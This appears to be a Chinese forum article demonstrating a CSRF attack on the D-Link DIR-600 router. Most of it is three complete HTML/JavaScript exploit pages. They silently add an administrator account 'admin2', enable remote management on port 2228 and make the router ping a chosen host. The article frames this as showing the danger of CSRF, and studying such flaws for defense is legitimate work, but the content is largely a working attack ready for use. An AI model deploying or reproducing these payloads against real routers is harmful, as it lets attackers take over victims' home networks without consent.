使用CSRF漏洞攻击D-link路由器全过程
<p><strong>1,介绍</strong></p><p>本文的目的是展示CSRF漏洞的危害,以D-link的DIR-600路由器(硬件版本:BX,固件版本:2.16)的CSRF漏洞为例。<br />D-link的CSRF漏洞已经是公开的,本文将详细描述一下整个D-link CSRF漏洞的利用,如何通过CSRF漏洞实现远程管理访问D-link路由器。</p>
<p><strong>2,CSRF漏洞说明</strong></p>
<p>如果某些request请求中没有csrf token或不需要密码授权,会存在CSRF漏洞,该漏洞允许攻击者伪造登录用户发送请求,因此可以导致用户执行攻击者想要的操作请求。<br />通过D-link 管理面板的CSRF漏洞,攻击者可以做以下操作:</p>
<p>@1,添加一个新的管理帐号;<br />@2,启用路由器的远程管理;<br />@3,ping特定的机器;此操作只需要登录路由器就可以实现,需要知道路由器的WAN IP地址。</p>
<p><strong>3,PART1:给路由器增加一个新的管理帐号</strong></p>
<p>需要两个request请求来完成</p>
<p>REQUEST1:<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode29"><html><br /><body><br /> <script><br /> function submitRequest()<br /> {<br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://192.168.0.1/hedwig.cgi", true);<br /> xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");<br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");<br /> xhr.withCredentials = "true";<br /> var body = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>"+<br />"<br /><postxml>"+<br />"<module>"+<br /> "<service>DEVICE.ACCOUNT</service>"+<br /> "<device>"+<br /> "<account>"+<br /> "<seqno/>"+<br /> "<max>1</max>"+<br /> "<count>2</count>"+<br /> "<entry>"+<br /> "<name>admin</name>"+<br /> "<br /><password>==OoXxGgYy==</password>"+<br /> "<group>0</group>"+<br /> "<description/>"+<br /> "</entry>"+<br /> "<entry>"+<br /> "<name>admin2</name>"+<br /> "<br /><password>pass2</password>"+<br /> "<group>0</group>"+<br /> "<description/>"+<br /> "</entry>"+<br /> "</account>"+<br /> "<session>"+<br /> "<captcha>0</captcha>"+<br /> "<dummy/>"+<br /> "<timeout>180</timeout>"+<br /> "<maxsession>128</maxsession>"+<br /> "<maxauthorized>16</maxauthorized>"+<br /> "</session>"+<br /> "</device>"+<br />"</module>"+<br />"<module>"+<br /> "<service>HTTP.WAN-1</service>"+<br /> "<inf>"+<br /> "<web>2228</web>"+<br /> "<weballow>"+<br /> "<hostv4ip/>"+<br /> "</weballow>"+<br /> "</inf>"+<br />"</module>"+<br />"<module>"+<br /> "<service>HTTP.WAN-2</service>"+<br /> "<inf>"+<br /> "<web>2228</web>"+<br /> "<weballow>"+<br /> "<hostv4ip/>"+<br /> "</weballow>"+<br /> "</inf>"+<br />"</module>"+<br />"</postxml>";<br /> xhr.send(body);<br /> }<br /> </script><br /><form action="#"><br /> <input type="button" value="Submit request1" onclick="submitRequest();" /><br /> </form><br /></body><br /></html></div><br />REQUEST2:<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode30"><html><br /><body><br /> <script><br /> function submitRequest()<br /> {<br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://192.168.0.1/pigwidgeon.cgi", true);<br /> xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");<br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");<br /> xhr.withCredentials = "true";<br /> var body = "ACTIONS=SETCFG%2CSAVE%2CACTIVATE";<br /> xhr.send(body);<br /> }<br /> </script><br /><form action="#"><br /> <input type="button" value="Submit request2" onclick="submitRequest();" /><br /> </form><br /></body><br /></html></div><br />REQUEST1和REQUEST2中,默认的路由局域网IP地址是192.198.0.1,管理帐号是admin,REQUEST1中的request请求中,当密码字段为==OoXxGgYy==的时候,是不会修改admin帐号的密码的。这两个请求完成了管理帐号admin2的添加,同时启用了远程管理端口2228.</p>
<p><strong>PART2:ping特定的主机</strong></p>
<p>REQUEST3:<br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode31"><html><br /><body><br /> <script><br /> function submitRequest()<br /> {<br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://192.168.0.1/diagnostic.php", true);<br /> xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");<br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");<br /> xhr.withCredentials = "true";<br /> var body = "act=ping&dst=X.Y.Z.W";<br /> xhr.send(body);<br /> }<br /> </script><br /><form action="#"><br /> <input type="button" value="Submit request3" onclick="submitRequest();" /><br /> </form><br /></body><br /></html></div><br />只需要求该代码中的X.Y.Z.W为你需要ping的主机IP地址就可以。</p>
頁:
[1]